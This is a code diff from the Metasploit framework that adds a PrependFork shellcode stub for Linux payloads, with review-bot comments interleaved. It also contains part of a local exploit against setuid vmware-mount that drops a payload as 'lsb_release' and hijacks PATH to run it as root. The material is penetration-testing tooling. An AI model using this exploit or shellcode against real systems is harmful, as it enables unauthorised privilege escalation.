Land #2325, @jlee-r7's Linux PrependFork addition
commit
206b52ea30
|
@ -19,6 +19,13 @@ module Msf::Payload::Linux
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
|
Msf::OptBool.new('PrependFork',
|
||||||
|
[
|
||||||
|
false,
|
||||||
|
"Prepend a stub that executes: if (fork()) { exit(0); }",
|
||||||
|
"false"
|
||||||
|
]
|
||||||
|
),
|
||||||
Msf::OptBool.new('PrependSetresuid',
|
Msf::OptBool.new('PrependSetresuid',
|
||||||
[
|
[
|
||||||
false,
|
false,
|
||||||
|
@ -97,6 +104,17 @@ module Msf::Payload::Linux
|
||||||
|
|
||||||
# Prepend
|
# Prepend
|
||||||
|
|
||||||
|
if (datastore['PrependFork'])
|
||||||
|
pre << "\x6a\x02" +# pushb $0x2 #
|
||||||
|
"\x58" +# popl %eax #
|
||||||
|
"\xcd\x80" +# int $0x80 ; fork #
|
||||||
|
"\x85\xc0" +# test %eax,%eax #
|
||||||
|
"\x74\x06" +# jz 0xf #
|
||||||
|
"\x31\xc0" +# xor %eax,%eax #
|
||||||
|
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||||
|
"\xcd\x80" # int $0x80 #
|
||||||
|
end
|
||||||
|
|
||||||
if (datastore['PrependSetresuid'])
|
if (datastore['PrependSetresuid'])
|
||||||
# setresuid(0, 0, 0)
|
# setresuid(0, 0, 0)
|
||||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||||
|
@ -197,10 +215,8 @@ module Msf::Payload::Linux
|
||||||
"\xcd\x80" # int $0x80 #
|
"\xcd\x80" # int $0x80 #
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
# Handle all Power/CBEA code here
|
# Handle all Power/CBEA code here
|
||||||
if (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
|
||||||
|
|
||||||
# Prepend
|
# Prepend
|
||||||
|
|
||||||
|
@ -277,9 +293,21 @@ module Msf::Payload::Linux
|
||||||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||||
"\x44\xff\xff\x02" # sc #
|
"\x44\xff\xff\x02" # sc #
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
|
||||||
if (test_arch.include?(ARCH_X86_64))
|
elsif (test_arch.include?(ARCH_X86_64))
|
||||||
|
|
||||||
|
if (datastore['PrependFork'])
|
||||||
|
# if (fork()) { exit(0); }
|
||||||
|
pre << "\x6a\x39" # push 57 ; __NR_fork #
|
||||||
|
pre << "\x58" # pop rax #
|
||||||
|
pre << "\x0f\x05" # syscall #
|
||||||
|
pre << "\x48\x85\xc0" # test rax,rax #
|
||||||
|
pre << "\x74\x08" # jz 0x08 #
|
||||||
|
pre << "\x48\x31\xff" # xor rdi,rdi #
|
||||||
|
pre << "\x6a\x3c" # push 60 ; __NR_exit #
|
||||||
|
pre << "\x58" # pop rax #
|
||||||
|
pre << "\x0f\x05" # syscall #
|
||||||
|
end
|
||||||
|
|
||||||
if (datastore['PrependSetresuid'])
|
if (datastore['PrependSetresuid'])
|
||||||
# setresuid(0, 0, 0)
|
# setresuid(0, 0, 0)
|
||||||
|
@ -389,8 +417,8 @@ module Msf::Payload::Linux
|
||||||
# Append exit(0)
|
# Append exit(0)
|
||||||
if (datastore['AppendExit'])
|
if (datastore['AppendExit'])
|
||||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||||
pre << "\x6a\x3c" # push 0x53 #
|
app << "\x6a\x3c" # push 0x3c #
|
||||||
pre << "\x58" # pop rax #
|
app << "\x58" # pop rax #
|
||||||
app << "\x0f\x05" # syscall #
|
app << "\x0f\x05" # syscall #
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
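Review bot: The x86 fork stub added in the second hunk (`pre << "\x6a\x02"` through the final `"\xcd\x80"`) never sets ebx before the parent's exit `int $0x80`, so the parent's exit status is whatever ebx happened to hold, while the x86_64 stub explicitly does `xor rdi,rdi` and the option text promises `if (fork()) { exit(0); }`. Zeroing ebx ahead of the fork keeps the `jz 0x06` offset intact: `pre << "\x31\xdb" +# xorl %ebx,%ebx #` placed before the `"\x6a\x02"` line (or, if the status is not meant to be guaranteed, drop the `0` from the description). A second gap: `PrependFork` is registered for every Linux payload, but as far as the visible hunks show only the x86 and x86_64 branches act on it, and the PPC/CBEA branch appears to ignore it silently; a sentence in the option description or a `print_warning` in that branch would avoid surprising users. The method these hunks belong to starts and ends outside the page.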
@ -43,6 +43,7 @@ class Metasploit4 < Msf::Exploit::Local
|
||||||
'DefaultOptions' => {
|
'DefaultOptions' => {
|
||||||
"PrependSetresuid" => true,
|
"PrependSetresuid" => true,
|
||||||
"PrependSetresgid" => true,
|
"PrependSetresgid" => true,
|
||||||
|
"PrependFork" => true,
|
||||||
},
|
},
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
@ -56,8 +57,6 @@ class Metasploit4 < Msf::Exploit::Local
|
||||||
'DisclosureDate' => "Aug 22 2013"
|
'DisclosureDate' => "Aug 22 2013"
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
# Handled by ghetto hardcoding below.
|
|
||||||
deregister_options("PrependFork")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
@ -73,22 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
||||||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||||
end
|
end
|
||||||
|
|
||||||
# Ghetto PrependFork action which is apparently only implemented for
|
write_file("lsb_release", generate_payload_exe)
|
||||||
# Meterpreter.
|
|
||||||
# XXX Put this in a mixin somewhere
|
|
||||||
# if(fork()) exit(0);
|
|
||||||
# 6A02 push byte +0x2
|
|
||||||
# 58 pop eax
|
|
||||||
# CD80 int 0x80 ; fork
|
|
||||||
# 85C0 test eax,eax
|
|
||||||
# 7406 jz 0xf
|
|
||||||
# 31C0 xor eax,eax
|
|
||||||
# B001 mov al,0x1
|
|
||||||
# CD80 int 0x80 ; exit
|
|
||||||
exe = generate_payload_exe(
|
|
||||||
:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
|
|
||||||
)
|
|
||||||
write_file("lsb_release", exe)
|
|
||||||
|
|
||||||
cmd_exec("chmod +x lsb_release")
|
cmd_exec("chmod +x lsb_release")
|
||||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||||
|
|
|
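Review bot: The replacement `write_file("lsb_release", generate_payload_exe)` makes detaching depend on the selected payload honoring the `PrependFork` default set in `DefaultOptions`, whereas the removed stub was prepended to `payload.encoded` unconditionally; a payload that does not mix in `Msf::Payload::Linux`, or whose architecture branch ignores the option, will now run inline under `cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")`, which presumably waits for it. If the module's payload compatibility is not already restricted to Linux x86/x86_64 payloads, that constraint belongs in the module info, or at minimum a comment before the `write_file` call: `# Detaching from vmware-mount relies on the payload's PrependFork advanced option (defaulted above).` The exploit method containing this hunk starts and ends outside the page.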
@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell'
|
||||||
require 'msf/base/sessions/command_shell_options'
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
include Msf::Payload::Linux
|
||||||
include Msf::Sessions::CommandShellOptions
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
|
|
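Review bot: `include Msf::Payload::Linux` brings in the whole mixin, not only `PrependFork`: its `register_advanced_options` block (visible in the first file of this commit) also registers `PrependSetresuid` and the other prepend/append options, and whether any of them take effect depends on this stager's generate path reaching the mixin's prepend logic, which this hunk does not show. A one-line comment above the include would save the next reader the lookup: `# Provides PrependFork and the other Linux prepend options (see Msf::Payload::Linux)`. If the stager already had its own prepend handling elsewhere in the file, please confirm the two paths do not apply twice.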
@ -24,7 +24,6 @@ module Metasploit3
|
||||||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptBool.new('PrependFork', [ false, "Add a fork() / exit_group() (for parent) code" ]),
|
|
||||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
@ -71,21 +70,6 @@ module Metasploit3
|
||||||
|
|
||||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||||
|
|
||||||
if(datastore['PrependFork'])
|
|
||||||
# fork() / parent does exit()
|
|
||||||
|
|
||||||
# If the target process is threaded, this means the thread
|
|
||||||
# will exit. exit_group() will try to close the process down
|
|
||||||
# completely.. and if we do that, it may not be reaped
|
|
||||||
# correctly.
|
|
||||||
#
|
|
||||||
# Plus, depending on the vuln, we might get multiple shots at
|
|
||||||
# owning a finite amount of threads.
|
|
||||||
|
|
||||||
midstager <<
|
|
||||||
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80"
|
|
||||||
end
|
|
||||||
|
|
||||||
midstager <<
|
midstager <<
|
||||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||||
|
|
|
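Review bot: The block deleted in the second hunk carried the only explanation of why the parent calls `exit` rather than `exit_group` (threaded targets, the process not being reaped, keeping other threads available), and nothing equivalent lands next to the mixin's new stubs, which make the same choice (`movb $0x1,%al` on x86, `push 60 ; __NR_exit` on x86_64). Please move that rationale into `Msf::Payload::Linux`, e.g. `# Parent uses exit(), not exit_group(): in a threaded target only this thread should die, so the process stays reapable and other threads remain exploitable.` As far as the commit shows, the fork also moves from the midstager into the stager's prepend, i.e. before staging rather than after, and users of this stage lose the regular `PrependFork` option in favour of the stager's advanced one; if that ordering change is intended, the commit message should say so. The method containing the midstager starts and ends outside the page.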
@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
|
||||||
require 'msf/base/sessions/command_shell_options'
|
require 'msf/base/sessions/command_shell_options'
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
include Msf::Payload::Linux
|
||||||
include Msf::Sessions::CommandShellOptions
|
include Msf::Sessions::CommandShellOptions
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
|